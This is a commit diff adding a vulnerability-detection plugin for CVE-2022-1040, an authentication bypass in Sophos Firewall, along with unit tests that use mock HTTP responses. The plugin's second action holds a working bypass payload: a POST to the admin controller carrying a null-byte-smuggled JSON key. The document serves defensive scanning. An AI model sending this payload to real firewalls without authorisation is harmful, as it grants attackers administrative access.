Merge pull request #755 from doyensec:CVE-2022-1040

copybara-github · copybara-github · commit f7df903161ba · 2025-12-15T09:42:11.000-08:00
PiperOrigin-RevId: 844809294
Change-Id: I41277855d20b713a7971f36d9026027ddc214e2b
diff --git a/templated/templateddetector/plugins/cve/2022/Sophos_CVE_2022_1040.textproto b/templated/templateddetector/plugins/cve/2022/Sophos_CVE_2022_1040.textproto
@@ -0,0 +1,84 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "Sophos_CVE_2022_1040"
+  author: "Giacomo Coluccelli <giacomo@doyensec.com>"
+  version: "1.0"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "CVE_2022_1040"
+  }
+  severity: CRITICAL
+  title: "CVE-2022-1040 - Authentication Bypass on Sophos Firewall"
+  description:
+    "An authentication bypass vulnerability in the User Portal and Webadmin allows a "
+    "remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older."
+  recommendation:
+    "Upgrade Sophos Firewall. Fix included in v19.0 GA and v18.5 MR4 (18.5.4)."
+  related_id: {
+    publisher: "CVE"
+    value: "CVE-2022-1040"
+  }
+}
+
+config: {
+  disabled: false
+}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "fingerprint_sophos_firewall"
+  http_request: {
+    method: GET
+    uri: "/webconsole/webpages/login.jsp"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: { body {} contains: '<title>Sophos</title>' }
+      }
+    }
+  }
+}
+
+actions: {
+  name: "attempt_authentication_bypass"
+  http_request: {
+    method: POST
+    uri: "/webconsole/Controller"
+    headers: [
+      { name: "Content-Type" value: "application/x-www-form-urlencoded" }
+    ]
+    data: "mode=151&json={\"username\"%3a\"admin\",\"password\"%3a\"somethingnotpassword\",\"languageid\"%3a\"1\",\"browser\"%3a\"Chrome_101\",\"accessaction\"%3a1,+\"mode\\u0000ef\"%3a716}"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "{\"redirectionURL\":\"/webpages/index.jsp\",\"status\":200}" }
+        ]
+      }
+    }
+  }
+}
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  actions: [
+    "fingerprint_sophos_firewall",
+    "attempt_authentication_bypass"
+  ]
+}
diff --git a/templated/templateddetector/plugins/cve/2022/Sophos_CVE_2022_1040_test.textproto b/templated/templateddetector/plugins/cve/2022/Sophos_CVE_2022_1040_test.textproto
@@ -0,0 +1,47 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "Sophos_CVE_2022_1040"
+
+  # Important note: This plugin is used for unit testing. Running tests for this
+  # plugin should never be disabled.
+  disabled: false
+}
+tests: {
+  name: "whenVulnerable_returnsTrue"
+  expect_vulnerability: true
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/webconsole/webpages/login.jsp"
+        status: 200
+        body_content: "<title>Sophos</title>"
+      },
+      {
+        uri: "/webconsole/Controller"
+        status: 200
+        body_content: "{\"redirectionURL\":\"/webpages/index.jsp\",\"status\":200}"
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotVulnerable_returnsFalse"
+  expect_vulnerability: false
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/webconsole/webpages/login.jsp"
+        status: 200
+        body_content: "Not a Sophos Firewall"
+      },
+      {
+        uri: "/webconsole/Controller"
+        status: 200
+        body_content: "{\"redirectionURL\":\"/webpages/index.jsp\",\"status\":-1}"
+      }
+    ]
+  }
+}
